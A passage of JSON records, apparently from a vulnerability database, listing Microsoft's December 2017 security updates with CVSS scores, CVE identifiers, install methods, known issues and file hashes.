"integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11927"], "modified": "2017-12-12T08:00:00", "id": "KB4130957", "href": "https://support.microsoft.com/en-us/help/4130957", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-24T11:11:36", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Addresses additional issues with updated time zone information.\n * Security updates to the Microsoft Scripting Engine and Windows Server.\nFor more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update is now available for installation through WSUS. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4054521>) website.**File information**For a list of the files that are provided in this update, download the [file information for update 4054521](<http://download.microsoft.com/download/B/F/A/BFAC2CC0-4004-42A5-B859-B2B89B81773A/4054521.csv>).\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4054521 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2017-12-12T08:00:00", "id": "KB4054521", "href": "https://support.microsoft.com/en-us/help/4054521", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:11:37", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Addresses additional issues with updated time zone information.\n * Security updates to the Microsoft Scripting Engine and Windows Server.\nFor more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>)_._\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update is now available for installation through WSUS. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4054523>) website.**File information**For a list of the files that are provided in this update, download the [file information for update 4054523](<http://download.microsoft.com/download/D/9/D/D9D85C67-73B5-4DEA-A0A2-3C6CAD39EFB7/4054523.csv>).\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4054523 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2017-12-12T08:00:00", "id": "KB4054523", "href": "https://support.microsoft.com/en-us/help/4054523", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:11:29", "description": "None\n## Summary\n\nA remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploits this vulnerability could execute code on the target system. The attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. \n \nTo learn more about the vulnerability, go to [CVE-2017-11885](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-11885>).\n\n## More Information\n\nImportant \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4052303>) website. \n\n## Deployment information\n\nFor deployment details for this security update, see the following article in the Microsoft Knowledge Base:[Security update deployment information: December 12, 2017](<http://support.microsoft.com/en-us/help/20171212>)\n\n## More Information\n\n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files. \n \n**Windows Server 2008 file information**\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## How to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update: FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\n## File Information\n\n## File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4052303-x86.msu| DB04C6C78547402EA77DF8F66838EA9B8AAA47E6| 331BAFEC35448B35F4CCB640AC652719F4AF400212E171C10EEDD9238FA3F02B \nWindows6.0-KB4052303-ia64.msu| 2410CAA394F895CF6CF59AA49CA9D137014B0463| CA1B61B11A1A6F475E1EA6F18F44BF9C7F64CF8FFFF44A09A55F32277871ADEF \nWindows6.0-KB4052303-x64.msu| A7E2EEF99E0BDF69EEA850689ACD8D590F9B339F| D2B7C1BDD29A7B9811D1340B0E346833C6157B06E582375C0AEF113C58C62BC2 \n \n## For all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nIprtprio.dll| 6.0.6002.24231| 8,192| 02-Nov-2017| 21:47| x86 \nIprtrmgr.dll| 6.0.6002.24231| 252,928| 02-Nov-2017| 21:47| x86 \nMprdim.dll| 6.0.6002.24231| 68,608| 02-Nov-2017| 21:47| x86 \nRasmigplugin.dll| 7.2.6002.24231| 115,200| 02-Nov-2017| 21:48| x86 \nRtm.dll| 6.0.6002.24231| 114,688| 02-Nov-2017| 21:48| x86 \n \n## For all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nIprtprio.dll| 6.0.6002.24231| 16,384| 02-Nov-2017| 15:22| IA-64 \nIprtrmgr.dll| 6.0.6002.24231| 583,168| 02-Nov-2017| 15:22| IA-64 \nMprdim.dll| 6.0.6002.24231| 169,984| 02-Nov-2017| 15:22| IA-64 \nRasmigplugin.dll| 7.2.6002.24231| 289,792| 02-Nov-2017| 15:22| IA-64 \nRtm.dll| 6.0.6002.24231| 317,952| 02-Nov-2017| 15:22| IA-64 \nIprtprio.dll| 6.0.6002.24231| 8,192| 02-Nov-2017| 21:47| x86 \nIprtrmgr.dll| 6.0.6002.24231| 252,928| 02-Nov-2017| 21:47| x86 \nMprdim.dll| 6.0.6002.24231| 68,608| 02-Nov-2017| 21:47| x86 \nRasmigplugin.dll| 7.2.6002.24231| 115,200| 02-Nov-2017| 21:48| x86 \nRtm.dll| 6.0.6002.24231| 114,688| 02-Nov-2017| 21:48| x86 \n \n## For all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nIprtprio.dll| 6.0.6002.24231| 9,728| 02-Nov-2017| 22:45| x64 \nIprtrmgr.dll| 6.0.6002.24231| 279,552| 02-Nov-2017| 22:45| x64 \nMprdim.dll| 6.0.6002.24231| 87,552| 02-Nov-2017| 22:46| x64 \nRtm.dll| 6.0.6002.24231| 137,728| 02-Nov-2017| 22:46| x64 \nIprtprio.dll| 6.0.6002.24231| 8,192| 02-Nov-2017| 21:47| x86 \nIprtrmgr.dll| 6.0.6002.24231| 252,928| 02-Nov-2017| 21:47| x86 \nMprdim.dll| 6.0.6002.24231| 68,608| 02-Nov-2017| 21:47| x86 \nRtm.dll| 6.0.6002.24231| 114,688| 02-Nov-2017| 21:48| x86 \nRasmigplugin.dll| 7.2.6002.24231| 153,600| 02-Nov-2017| 22:46| x64 \nRasmigplugin.dll| 7.2.6002.24231| 115,200| 02-Nov-2017| 21:48| x86\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "Description of the security update for the Windows RRAS Service remote code execution vulnerability in Windows Server 2008: December 12, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2017-12-12T08:00:00", "id": "KB4052303", "href": "https://support.microsoft.com/en-us/help/4052303", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:11:37", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Addresses additional issues with updated time zone information.\n * Security updates to the Microsoft Scripting Engine and Windows Server.\nFor more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>)_._\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update is now available for installation through WSUS. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4054522>) website.**File information**For a list of the files that are provided in this update, download the [file information for update 4054522](<http://download.microsoft.com/download/1/A/B/1AB87DD9-C3CC-4807-AA42-01CFC6411DAB/4054522.csv>).\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4054522 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2017-12-12T08:00:00", "id": "KB4054522", "href": "https://support.microsoft.com/en-us/help/4054522", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T10:36:51", "description": "None\n## Improvements and fixes\n\nThis update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Addresses issue where users of SQL Server Reporting Services may not be able to use the scrollbar in a drop-down list.\n * Addresses additional issues with updated time zone information.\n * Addresses issue where, after you install KB4041688, KB4052231, or KB4048953, the error \"CDPUserSvc_XXXX has stopped working\" appears. Additionally, this resolves the logging of Event ID 1000 in the Application event log. It notes that svchost.exe_CDPUserSvc_XXXX stopped working and the faulting module name is \"cdp.dll\".\n * Security updates to the Microsoft Scripting Engine and Microsoft Edge.\n**Note: **This update isn't available with express installation files for Windows Server 2016.If you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n**Windows Update Client Improvement**Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability. It will only affect devices that haven't installed the most recent updates.\n\n## Known issues in this update\n\nSymptom| Workaround \n---|--- \nAfter installing this update, servers where Credential Guard is enabled may experience an unexpected restart with the error, \"The system process lsass.exe terminated unexpectedly with status code -1073740791. The system will now shut down and restart.\"Event ID 1000 in the application log shows: \"C:\\windows\\system32\\lsass.exe' terminated unexpectedly with status code -1073740791Faulting application: lsass.exe, Version: 10.0.14393.1770, Time Stamp: 0x59bf2fb2Faulting module: ntdll.dll, Version: 10.0.14393.1715, Time Stamp: 0x59b0d03eException: 0xc0000409| This issue is resolved in KB4077525. \n \n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4053579>) website.**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4053579](<http://download.microsoft.com/download/B/C/0/BC0B73A3-6094-473B-AF66-143757D547D7/4053579.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4053579 (OS Build 14393.1944)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4053579", "href": "https://support.microsoft.com/en-us/help/4053579", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T10:36:53", "description": "None\n## Improvements and fixes\n\nThis update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Addresses issue where users of SQL Server Reporting Services may not be able to use the scrollbar in a drop-down list.\n * Addresses additional issues with updated time zone information.\n * Addresses issue that affected some Epson SIDM (Dot Matrix) and TM (POS) printers, which were failing to print on x86-based and x64-based systems. This issue affects KB4048956.\n * Security updates to the Microsoft Scripting Engine, Microsoft Edge, and Windows Server.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>)_._\n\n**Windows Update Client Improvement**Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability. It will only be offered to devices that haven't installed the most recent updates.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4053581>) website.**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4053581](<http://download.microsoft.com/download/F/E/1/FE1FD527-89EC-472A-AC5F-185293C8FB1E/4053581.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4053581 (OS Build 10240.17709)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4053581", "href": "https://support.microsoft.com/en-us/help/4053581", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T10:37:03", "description": "None\n## Improvements and fixes\n\nThis security update includes improvements and fixes that were a part of update KB4050946 (released November 27, 2017) and addresses the following issues:\n\n * Addresses issue where users of SQL Server Reporting Services may not be able to use the scrollbar in a drop-down list.\n * Addresses additional issues with updated time zone information.\n * Security updates to the Microsoft Scripting Engine and Windows Server.\nFor more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4054519>) website.**File information**For a list of the files that are provided in this update, download the [file information for update 4054519](<http://download.microsoft.com/download/0/D/1/0D1E3A78-BE95-4502-8BA4-88663CF9197E/4054519.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4054519 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4054519", "href": "https://support.microsoft.com/en-us/help/4054519", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:11:29", "description": "None\n_This update can be applied to Windows 10 Enterprise and Windows 10 Education editions only. _\n\n## Improvements and fixes\n\nThis update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Addresses additional issues with updated time zone information.\n * Addresses issue that affected some Epson SIDM (Dot Matrix) and TM (POS) printers, which were failing to print on x86-based and x64-based systems. This issue affects KB4048952.\n * Security updates to the Microsoft Scripting Engine, Microsoft Edge, and Windows Server.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>)_._\n\n**Windows Update Client Improvement**Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability. It will only be offered to devices that haven't installed the most recent updates.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4053578>) website.**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4053578](<http://download.microsoft.com/download/0/F/7/0F772332-4655-4A81-9D65-9D49318AC7FA/4053578.csv>).\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4053578 (OS Build 10586.1295)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T08:00:00", "id": "KB4053578", "href": "https://support.microsoft.com/en-us/help/4053578", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-10T10:20:57", "description": "None\n## Summary\n\nThis security update resolves several reported vulnerabilities in Internet Explorer. The most severe of these vulnerabilities could allow remote code execution if a user views a specially crafted webpage in Internet Explorer. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/en-US/security-guidance/>). Additionally, see the following articles for more information about this cumulative update:\n\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/en-us/help/4009469/windows-7-sp1-windows-server-2008-r2-sp1-update-history>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/en-us/help/4009471/windows-server-2012-update-history>)\n * [Windows 8.1 and Windows Server 2012 R2 update history](<https://support.microsoft.com/en-us/help/4009470/windows-8-1-windows-server-2012-r2-update-history>)\n * [Windows 10 and Windows Server 2016 update history](<https://support.microsoft.com/en-us/help/4000825/windows-10-and-windows-server-2016-update-history>)\n**Important**\n\n * The fixes that are included in this Security Update for Internet Explorer 4052978 are also included in the December 2017 Security Monthly Quality Rollup. Installing either the Security Update for Internet Explorer or the Security Monthly Quality Rollup installs the fixes that are in this update.\n * If you use update management processes other than Windows Update and you automatically approve all security updates classifications for deployment, this Security Update for Internet Explorer 4052978, the December 2017 Security Only Quality Update, and the December 2017 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * This Security Update for Internet Explorer is not applicable for installation on a computer where the Security Monthly Quality Rollup or the Preview of Monthly Quality Rollup from December 2017 (or a later month) is already installed. This is because those updates contain all fixes that are in this Security Update for Internet Explorer.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Deployment information\n\nFor deployment details for this security update, see the following article in the Microsoft Knowledge Base:Security update deployment information: December 12, 2017\n\n## How to get and install the update \n\n### Method 1: Microsoft Update\n\nThis update is available through Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically.For more information about how to get security updates automatically, see [Windows Update: FAQ](<http://support.microsoft.com/en-us/help/12373/windows-update-faq>).**Note** For Windows RT and Windows RT 8.1, this update is available through Microsoft Update only.\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=kb4052978>) website.\n\n## More Information\n\n## \n\n__\n\nHow to get help and support for this security update\n\nHelp for installing updates: [Windows Update: FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)\n\nFile informationFor a list of the files that are provided in this cumulative update, download the [file information for cumulative update KB 4052978](<http://download.microsoft.com/download/C/F/7/CF7CCEC7-43BD-4D1F-A1B4-8144F6A6D35F/4052978.csv>).\n\n## File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows8.1-KB4052978-x86.msu| DFFD7ADD5FF57CE58D4D3FA250999D0C76DDB059| 5360A01857C1C94962A35C12249C62B20FD2070D9303E31773DFD1704640C94D \nWindows8.1-KB4052978-x64.msu| 95978DBA754B4097031F369A23BF1C17BD81F7D7| 70C7DAEB39EEDB0F8E1B03851FCE66B36B68AE13DDDB1CC56D8202E84CD3D36C \nWindows8-RT-KB4052978-x64.msu| FC28568EBA01C2FA019469393091A2DEDC9FE262| 1AA6D2D922002CCE357942B7003FD364DF09E118F1A783A303207EF6BE54B7AA \nIE11-Windows6.1-KB4052978-X64.msu| EFA1E0C54BCEBD5117891D8E82104CEE742444C2| 9F289E216653A82485D90667DF8E1FA209C497775D063A0B305B3440883680C9 \nIE11-Windows6.1-KB4052978-X86.msu| 92C867719463186F23E992EBF1AD6442DF3DD949| 3455AB15B8CEC9AFDA1AE382248E438B3A0D403D5D81476914D430C90EC3FF45 \nIE9-Windows6.0-KB4052978-X86.msu| E6B5ED0888DA1070EE47067D30DFE9C0F08EF9F1| 2D210B855AB5DA7B6282EDA0B025FC0CDE8BC9ED77F460DB91F43ED99DD53877 \nIE9-Windows6.0-KB4052978-X64.msu| 8135281F95B2A577506830C2B17CA65B86600A74| 5E4475E4C8CBF88F8C9F0E570D3D7ECCDC02158FF274AC4C2A191732FDA85FAF\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "Cumulative security update for Internet Explorer: December 12, 2017", "bulletinFamily": "microsoft", 